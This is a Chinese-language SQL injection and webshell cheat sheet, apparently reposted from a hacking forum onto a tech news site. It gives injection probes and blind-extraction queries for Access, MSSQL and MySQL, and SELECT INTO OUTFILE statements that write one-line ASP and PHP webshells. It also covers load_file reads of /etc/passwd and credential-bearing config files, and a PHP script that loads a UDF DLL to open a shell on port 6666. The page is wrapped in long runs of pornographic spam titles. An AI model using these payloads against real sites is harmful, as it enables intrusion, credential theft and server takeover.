精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

滲透筆記之腳本入侵(ASP、PHP)

安全 應用安全
建立一個有一個A字段的表 表名為a 字段類型為字符長度為50,在表A的a字段插入密碼為90sec的一句話木馬,把表a的內容導出為物理路徑的一個EXCEL文件,導出為EXCEL后在利用IIS解析漏洞就可以變成小馬了。

簡單判定有無漏洞:

粗略型:'

1. 數字型:

and 1=1 and 1=2

2.字符型:

' and '1'='1 ' and '1'='2

3.搜索型:

%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%

(PS:第三個大家可能不常用,他一般在ASP腳本中一般寫成:keyword=request(”keyword”),賦值“KYO”到SQL語句中的時候即變為Select * from 表名 where keyword like ‘%KYO%’)

簡單判斷數據庫信息:

語句型(IIS報不報錯,語句自己區分):

and user>0

and  (select count(*) from msysobjects)>0 ……(頁面錯誤為access數據庫)

and  (select count(*) from sysobjects)>0 ……(頁面正常為MSSQL數據庫)

and  db_name()>0 ……(爆數據庫名)

version>0  (爆SQLServer版本信息以及服務器操作系統的類型和版本信息)

粗略型:加 ’(根據服務器報錯的信息來判斷)

加 ;--(;和--MSSQL數據庫里面一般都有, ; 表示分離,-- 則是注釋符ACCESS數據庫里沒有)

判斷MYSQL權限:

and 0<>(Select ISSRVROLEMEMBER(’sysadmin’))--(頁面正常則為SA)

and 0<>(Select IS_MEMBER(’db_owner’))--(頁面正常則為db_owner)

and 0<>(Select IS_MEMBER(’public’))--(頁面正常則是public)

PS:以上方法適用于參數是int的時候,若為字符型,需在參數后添加’和查詢語句后添加;--

開始進行SQL注入(ACCESS):

猜解表名:

and 0<>(select count(*) from 表名) 或and exists(Select * from 表名)

and 1<(select count(*) from 表名) (頁面錯誤說明帳號數目就是1個)

猜解字段:

and exists(Select 字段名 from 表名)(頁面正常存在,不正常不存在)

猜解用戶名和密碼長度:

and(Select top 1 len(列名) from 表名)>N (TOP表示把最前面的一條記錄提取出來;N為變換猜解的列長度,頁面錯誤即說明該列長度為N)

如:and 1=(select count(*) from user where len(name)>6) 錯誤

and 1=(select count(*) from user where len(name)>5) 正確

則長度是6

猜解用戶名和密碼:and (select top 1 asc(mid(列名,1,1)) from 表名)>0

如:and (select top 1 asc(mid(user,1,1)) from name)>96頁面正常

and (select top 1 asc(mid(user,1,1)) from name)>97頁面錯誤

則ASCLL碼為97

PS:因為MD5的密文只有16,18,32,40這幾個,所以猜解密碼的時候只要試一試15,16,17,18,31,32,39,40等就簡單些。

開始進行SQL注入(MYSQL):

爆出表名和字段: having 1=1--

插入新記錄: group by users.ID having 1=1--

group by users.ID, users.username, users.password, users.privs having 1=1--

; insert into users values( 666, attacker, foobar, 0xffff )--

猜解表名:and (select top 1 name from sysobjects where xtype='u')>0 (獲得第一個表名)

and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0(獲得第二個表名)

………………

猜解列名:and (select top 1 col_name(object_id('字段'),1) from sysobjects)>0(得到字段的第一個列名)

猜解字段內容:and (select top 1 列名 from [表名])>0

如:and (select top 1 username from [admin])>0 (獲取用戶名)

and (select top 1 password from [admin])>0 (獲取密碼)

導出webshell:

1.利用SQL執行命令功能導出WebShell:

SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote

PS:需提供SQL執行功能且知道絕對路徑方可使用(vote為已知表段)

2.建立一個有一個A字段的表 表名為a 字段類型為字符長度為50,在表A的a字段插入密碼為90sec的一句話木馬,把表a的內容導出為物理路徑的一個EXCEL文件,導出為EXCEL后在利用IIS解析漏洞就可以變成小馬了。

語句:

create table cmd (a varchar(50))

insert into cmd (a) values ('<%execute request("90sec")%>')

select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd

drop table cmd

復制代碼

提權:

1.system權限下直接添加賬號(可能的話):直接CMD命令添加

2.使用shell自帶的提權功能:Serv_U,pcAnywhere,Radmin密碼讀取等,全部試一試

3.利用系統的漏洞進行溢出提權:利用巴西烤肉提權,在CMD命令一行里輸入C:\recycler\1.exe空格“CMD命令”,1.exe就是巴西烤肉咯

4.用軟件的漏洞來提權(這個機會比較渺茫,個人沒有成功過)

5.在conn.asp webconfig.asp等文件查找SA密碼或者查找inc.php 等文件里面的ROOT密碼(可以用CMD語句查找,如:利用CMD命令 dir /s d:\conn.asp 或者 dir /s d:\*inc*.php 來查找配置文件)

PHP+MYSQL

1.漏洞判斷同上。

2.數據庫信息判斷:

1.數據庫類型,簡單的直接利用上面的相關語句就可以

2.爆數據庫的版本信息,庫名以及用戶名(前提得到字段數及可利用字段):and 1=2 union select 1,2,3,4,version(),database(),user(),8--

或者:+union+select+1,2,,3,4,database(),version(),user(),8 (要在參數前加-)

3.數據庫權限:and ord(mid(user(),1,1))=114 /* (頁面正常說明為root)

4.爆操作系統相關信息:and 1=2 union all select @@global.version_compile_os from mysql.user /*

3.開始注入:

1.查詢字段: (1)用union聯合查詢:and 1=1 union select 1,2,3,4,5……

(2)用order by 查詢“order by *--

2.爆可利用字段:and 1=2 union select 1,2,3,4,5,6,7……--

或者+union+select+1,2,3,4,5,6,7…… (要在參數前加-)

PS:不用猜解可用字段暴數據庫信息(部分網站適用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

第一種方法:  暴庫

3.暴庫 (前提是mysql>5.0,因為Mysql 5 以上有內置庫 information_schema,存儲著mysql的所有數據庫和表結構信息):

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

4.猜解表名:and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=數據庫(十六進制) limit 0(開始的記錄,0為第一個開始記錄),1(顯示1條記錄)--

5.猜解字段:and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六進制)limit 0,1

6.爆密碼:and 1=2 Union select 1,2,3,用戶名段,5,6,7,密碼段,8,9 from 表名 limit 0,1

PS:高級用法:Union select 1,2,3concat(用戶名段,0x3c,密碼段),5,6,7,8,9 from 表名 limit 0,1

第二種方法:利用虛擬庫information_schema 爆表

3.+union+select+1,2,3,4,table_name,5+from+information_schema.tables+where+table_schema=數據庫名的16進制+limit+1,1

或者and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=數據庫名的16進制 limit 1,1--

PS: limit 1,1可以變化,查詢下一個

4.利用表爆字段:+union+select+1,2,3,4,column_name,5+from+information_schema.columns+where+table_name=爆出來的字段的16進制                                           或者:and 1=2 union select 1,2,3,4,column_name,5 from information_schema.columns where table_name=爆出來的字段的16進制--

5.爆用戶名和密碼:+union+select+1,2,3,用戶名字段,密碼字段,6+from+管理表

或者:and 1=2 union select 1,2,3,用戶名字段,密碼字段,6 from 管理表--

(PS:一次性爆表:.+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6+from+information_schema.columns+where+table_schema=數據庫名的16進制

一次性爆出所有字段:+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6+from+information_schema.columns+where+table_schema=數據庫名的16進制

一次性爆密碼和用戶名:+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+用戶名,0x5f,密碼),6+from+管理表)

PS:這里面所有的+號是代替空格的,還可以用/**/來代替,不同情況,不同分析!但是參數前必須加-4.拿webshell

1.導出一句話拿WebShell

Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL); Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); Select cmd from temp into out file 'F:/wwwroot/eval.php'; Drop TABLE IF EXISTS temp;

或者:

Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

復制代碼

PS:eval.php是導入對象

5.提權:

第一種方法:直接寫馬(Root權限)

條件:1、知道站點物理路徑

2、有足夠大的權限(可以用select …. from mysql.user測試)

3、magic_quotes_gpc()=OFF

select   ‘<?php eval($_POST[cmd])?>’   into outfile ‘物理路徑’

and 1=2 union all select 一句話HEX值 into outfile '路徑'

load_file() 常用路徑:

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面兩個是查看一個PHP文件里完全顯示代碼.有些時候不替換一些字符,如 “<” 替換成”空格” 返回的是網頁.而無法查看到代碼.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系統根目錄

4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虛擬主機配置文件

5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系統apache文件

6、c:/Resin-3.0.14/conf/resin.conf   查看jsp開發的網站 resin文件配置信息.

7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系統配置的JSP虛擬主機

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路徑

11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虛擬主機配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf 針對3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虛擬主機查看

15、 /etc/sysconfig/iptables 本看防火墻策略

16 、 usr/local/app/php5 b/php.ini PHP 的相當設置

17 、/etc/my.cnf MYSQL的配置文件

18、 /etc/redhat-release   紅帽子的系統版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系統中的用戶密碼

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相關設置

22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虛擬網站設置

23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini

25、c:\boot.ini

網站常用配置文件 config.inc.php、config.php。load_file()時要用replace(load_file(HEX),char(60),char(32))

注:

Char(60)表示 <

Char(32)表示 空格

第二種方法:直接在PHPSPY新建一個PHP文件.

輸入以下的內容

$link=mysql_connect('127.0.0.1','root','root');

if (!$link) {die('Could NOt Connect The Database!: ' . mysql_error());};

echo "Good Boy.Connected!";

//這里的root\root就是從my.ini中讀取的用戶和密碼.

@mysql_select_db('mysql') or die ('use database mysql failed!');

echo "Yes You Did!";

//這里選擇使用MySQL數據庫表.當然你也可以選擇別的,如test.

$query="Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\FurQ.dll';";

@$result = mysql_query($query, $link) or die ("Create Function Failed!");

echo "Goddess...Successed!";

//這兩句話是關鍵,執行MySQL的創建函數語句.將d:\wwwroot\furq.dll中的Shell函數創建進MySQL中.使得MySQL可以執行這個Shell函數.

$query="Select Shell();";

@$result = mysql_query($query, $link) or die ("Execute failed");

echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ";

//這一步是執行這個Shell函數,打開服務器的6666端口.

?>

然后再執行,由于繼承的是MySQL的權限,而Win系統下MySQL默認以服務安裝,所以得到的Shell為LocalSystem權限

責任編輯:藍雨淚 來源: 法克論壇
相關推薦

2011-08-24 13:24:52

2010-09-14 17:20:57

2013-12-30 13:11:03

2013-11-28 10:32:10

2013-12-10 09:51:18

2013-12-24 13:15:59

2014-04-03 09:35:28

2013-11-28 13:03:17

2013-11-28 11:29:39

2014-02-18 15:53:04

2009-11-16 14:38:36

PHP上傳文件代碼

2014-06-09 14:18:24

2011-08-24 13:24:41

2011-08-24 13:42:33

2011-04-08 10:15:11

2010-09-16 17:47:49

2015-02-26 15:02:37

2009-08-05 17:58:24

UpdatePanel

2015-10-27 11:11:46

2014-11-21 10:32:33

點贊
收藏

51CTO技術棧公眾號

欧美日韩xx| 一区二区视频免费| 中国av一区| 色菇凉天天综合网| 中文字幕中文字幕在线中心一区| 国产黄色一区二区| 午夜在线一区| 久久国产加勒比精品无码| 中文字幕天堂网| 国产精品亚洲d| 亚洲一区二区高清| 视频一区不卡| 色屁屁草草影院ccyycom| 秋霞成人午夜伦在线观看| 久久综合久中文字幕青草| 性久久久久久久久久久| 亚洲一区有码| 欧美性猛交xxxx| 久久久久福利视频| 搞黄视频免费在线观看| 国产91露脸合集magnet| 国产精品色视频| 日本污视频在线观看| 久久社区一区| 亚洲色图第三页| 亚洲av成人片无码| 99精品视频在线免费播放| 欧美丝袜一区二区三区| 国产乱子伦精品视频| av在线中文| 久久久亚洲综合| 国产一区二区自拍| 国产a级免费视频| 美女视频网站久久| 国产97在线播放| 天天操天天干视频| 伊人成人在线视频| 欧美大奶子在线| 91香蕉一区二区三区在线观看| 免费毛片在线不卡| 亚洲精品美女在线观看| 无码人妻丰满熟妇啪啪网站| 国产精品高清一区二区| 欧美色视频一区| 国产又大又黄又粗的视频| 老牛影视精品| 天天综合日日夜夜精品| 欧美亚洲黄色片| av在线不卡免费| 亚洲一区二区不卡免费| 在线观看污视频| 伊人影院蕉久影院在线播放| 亚洲欧美一区二区三区国产精品| 在线观看一区欧美| 免费观看在线午夜影视| 国产精品成人免费精品自在线观看| 日韩激情视频| 日本网站在线免费观看视频| 中文一区在线播放| 一区二区三区国| 国产精品实拍| 亚洲精品成人悠悠色影视| 国产欧美123| av不卡高清| 一区二区成人在线| 日韩五码在线观看| 亚洲人成在线网站| 色综合久久综合网| 天天天干夜夜夜操| www.91精品| 欧美www视频| 日本xxxx裸体xxxx| 国产成人黄色| 久久久精品免费视频| 免费在线观看日韩| 99精品视频免费| 国产精品国语对白| 国产视频第一页| av在线播放成人| 日本一区二区高清视频| 久草中文在线观看| 亚洲成人自拍一区| 国产真实乱子伦| 四虎成人精品一区二区免费网站| 日韩亚洲欧美一区| 中文字幕在线免费看线人| 成人av资源电影网站| 久久久精品在线| 男人天堂中文字幕| 日韩av一二三| 国产高清精品一区二区三区| 午夜视频在线播放| 国产精品久久久久久久久搜平片 | 久久亚洲影视| 久久久久久久91| 中文天堂在线播放| 成人av在线影院| 亚洲bbw性色大片| 日本在线视频网址| 91国模大尺度私拍在线视频| 杨幂一区二区国产精品| 国产欧美日韩在线观看视频| 精品中文字幕在线| 国产字幕在线观看| 成人美女视频在线观看18| 欧美在线播放一区二区| 深夜国产在线播放| 欧洲精品在线观看| 久久久久国产精品无码免费看| 日韩欧美1区| 9.1国产丝袜在线观看| 国产精品一区二区三区在线免费观看| 99国产精品国产精品毛片| 一区二区三区欧美成人| 亚洲精品mv| 欧美精品一区二区三区蜜桃| 中国1级黄色片| 国产视频久久| 999精品在线观看| 免费看a在线观看| 欧美自拍丝袜亚洲| 久久国产精品无码一级毛片| 欧美女人交a| 成人a在线视频| 成黄免费在线| 色婷婷综合中文久久一本| 99久久久无码国产精品性波多| 久久蜜桃av| 国产精品久久久久久av福利软件 | 中国人与牲禽动交精品| 日韩欧美性视频| 成人免费看视频| 久久综合亚洲精品| 国产在线不卡一区二区三区| 中文字幕一区二区三区电影| 国产偷人爽久久久久久老妇app| av在线不卡网| 精品无码国模私拍视频| 7m精品国产导航在线| 久久av在线看| 国产毛片毛片毛片毛片| 国产精品初高中害羞小美女文| 天天操天天爽天天射| 视频国产一区| 国产精品第1页| 成年人视频在线看| 欧美性色黄大片| 五月婷婷婷婷婷| 美女国产一区二区三区| 亚洲国产一区二区精品视频| jizz亚洲女人高潮大叫| 一本一道久久a久久精品逆3p| 香蕉影院在线观看| 久久精品夜色噜噜亚洲aⅴ| 欧美性大战久久久久xxx| 亚洲欧洲免费| 国产v综合ⅴ日韩v欧美大片| 国产一二三区在线视频| 欧美熟乱第一页| 麻豆网址在线观看| 国产馆精品极品| 成人网站免费观看入口| 亚洲精品播放| 国产精品白丝jk喷水视频一区| 都市激情在线视频| 欧美日韩和欧美的一区二区| 国产wwwwxxxx| 国产一区二区三区四区五区美女| 欧美一级黄色录像片| 伊人久久影院| 4388成人网| av中文在线| 日韩视频一区二区三区在线播放| 国产一级特黄毛片| 久久综合成人精品亚洲另类欧美| 男女视频一区二区三区| 五月天综合网站| 国产精品免费一区二区三区在线观看 | 91在线国产福利| 午夜激情福利在线| 亚洲电影在线一区二区三区| 国产精品久久久久久免费观看 | 色婷婷亚洲一区二区三区| 非洲一级黄色片| 国产一本一道久久香蕉| 真人抽搐一进一出视频| 欧美精品一区二区三区精品| 91在线网站视频| 色戒汤唯在线观看| 日韩色av导航| 青青草视频免费在线观看| 欧美群妇大交群的观看方式| 国产成人无码一区二区三区在线| 国产免费久久精品| 中文字幕亚洲日本| 丝袜脚交一区二区| 韩国无码av片在线观看网站| 神马影视一区二区| 99一区二区| 日韩高清中文字幕一区二区| 久久99视频精品| 成人免费高清在线播放| 精品剧情在线观看| 中文字幕丰满人伦在线| 亚洲高清久久久| 欧美性生交大片| xfplay精品久久| 中文字幕第10页| 蜜桃视频一区二区| 久久无码高潮喷水| 欧美日韩免费观看一区=区三区| 日本一区二区三不卡| 国产精品17p| 国产精品美乳一区二区免费 | 欧美三级中文字幕在线观看| 日韩欧美a级片| 一区二区三区中文字幕精品精品 | 色婷婷一区二区三区| 久久精品国产美女| 2020国产精品极品色在线观看| 国产精品欧美风情| 韩国美女久久| 91高清视频免费观看| 日韩免费影院| 欧美成人免费一级人片100| www.中文字幕久久久| 亚洲免费视频一区二区| www.综合色| 欧美一区二区视频免费观看| 欧美成人一区二区视频| 色婷婷综合在线| 亚洲 欧美 中文字幕| 日韩欧美在线免费| 在线观看免费国产视频| 香港成人在线视频| 国产精品18p| 亚洲mv在线观看| 国产稀缺真实呦乱在线| 夜夜亚洲天天久久| 欧美人禽zoz0强交| 亚洲另类在线一区| 欧美又粗又大又长| 亚洲精品欧美激情| 激情五月少妇a| 一区二区三区小说| 欧美日韩国产精品一区二区三区| 亚洲欧美色一区| 欧美高清视频一区二区三区| 一区二区三区欧美久久| 日本妇女毛茸茸| 洋洋av久久久久久久一区| 久久久国产精华液| 亚洲一区在线观看视频| 日本熟女一区二区| 欧美三级欧美成人高清www| 亚洲久久在线观看| 色噜噜狠狠色综合中国| 成人黄色片在线观看| 欧美日韩电影在线播放| 国产免费久久久| 精品久久久久久久久久久院品网| 日韩一级片免费观看| 亚洲国产精品小视频| 精品乱码一区二区三四区视频| 亚洲一区二区国产| 欧美人xxx| 色综合色综合久久综合频道88| 日皮视频在线观看| 91精品成人久久| 欧美xnxx| 亚洲一区亚洲二区| 久久久精品国产**网站| 欧美日韩一区在线视频| 久久中文字幕av| 国产成人永久免费视频| 亚洲国产高清视频| 久久国产乱子伦免费精品| 久久国产精品一区二区| 中国特级黄色片| 国产日产欧产精品推荐色| 亚洲AV成人无码精电影在线| 午夜影院久久久| 中文字幕观看在线| 精品日韩欧美在线| 国产免费视频在线| 欧美福利小视频| 日韩欧美一区二区三区免费观看| 成人精品在线观看| 欧美1区2区3区4区| 亚洲一区二区在| 9色精品在线| 亚洲精品第三页| 97久久精品人人爽人人爽蜜臀| 亚洲欧美日韩第一页| 亚洲国产毛片aaaaa无费看 | 欧美第一区第二区| 蜜桃视频在线观看视频| 久久夜精品va视频免费观看| 小h片在线观看| 亚洲va男人天堂| 欧美猛男同性videos| 韩国无码av片在线观看网站| 日韩av一区二| 一女三黑人理论片在线| 亚洲人成7777| 亚洲高清在线看| 亚洲福利视频在线| 成人在线观看亚洲| 国产精品成人在线| 一区中文字幕| 老司机av福利| 日韩电影在线观看网站| 国产精品久久久久久亚洲av| 国产精品久久国产精麻豆99网站| 日本中文字幕在线免费观看| 欧美一区中文字幕| av资源网站在线观看| 欧美专区在线观看| 国产精品中文字幕制服诱惑| 综合色婷婷一区二区亚洲欧美国产| 国产精品久久久久毛片大屁完整版| 欧美国产在线一区| 中文字幕乱码亚洲精品一区| 久久久免费高清视频| 精品国产乱码久久久久久久久 | 天天躁日日躁狠狠躁喷水| 欧美刺激性大交免费视频| 国产香蕉久久| 日韩动漫在线观看| 午夜在线视频观看日韩17c| 欧美xxxxx精品| 亚洲国产你懂的| 高h放荡受浪受bl| 欧美国产日韩一区二区在线观看| 伊人久久精品| 亚洲视频精品一区| 美日韩一区二区三区| 亚洲毛片亚洲毛片亚洲毛片| 一本色道**综合亚洲精品蜜桃冫| 天天av天天翘| 97久久精品国产| 免费看久久久| 日韩国产欧美亚洲| 97久久精品人人做人人爽| 国偷自拍第113页| 日韩风俗一区 二区| 看黄在线观看| 欧美精品123| 另类天堂av| 中文字幕黄色网址| 欧美日韩免费一区二区三区视频| 成人在线免费看| 国产精品美女www| 国产高清欧美| 永久av免费在线观看| 亚洲综合男人的天堂| 成人免费一级视频| 午夜精品蜜臀一区二区三区免费 | 青青久久精品| 亚洲国产精品一区二区第一页| 蜜桃一区二区三区在线| 91高清免费观看| 精品成人免费观看| 日本在线影院| 亚洲国产精品一区二区第四页av| 精品一区二区日韩| 欧美精品一级片| 亚洲精品美女免费| 成人免费毛片嘿嘿连载视频…| 伊人久久大香线蕉精品| 国产成人午夜99999| 西西44rtwww国产精品| 国产一区二区三区直播精品电影| 91天天综合| 欧美做暖暖视频| xf在线a精品一区二区视频网站| 波多野结衣爱爱| 美女av一区二区| 色狼人综合干| 国产九九在线视频| 一区二区三区精品视频| 欧美孕妇孕交| 成人激情视频在线播放| 亚洲一级网站| 蜜桃久久精品成人无码av| 日韩一区二区麻豆国产| 中文字幕乱码在线播放| 一区二区不卡在线视频 午夜欧美不卡'| 国产精品一区二区久久不卡| 在线能看的av| 久久久久北条麻妃免费看| 日本亚洲不卡| 国产高清av片| 黑人精品xxx一区一二区| 麻豆tv入口在线看| 久久天堂国产精品| 国产精品一二三四| 久久久久在线视频| 欧美激情欧美激情在线五月| heyzo久久|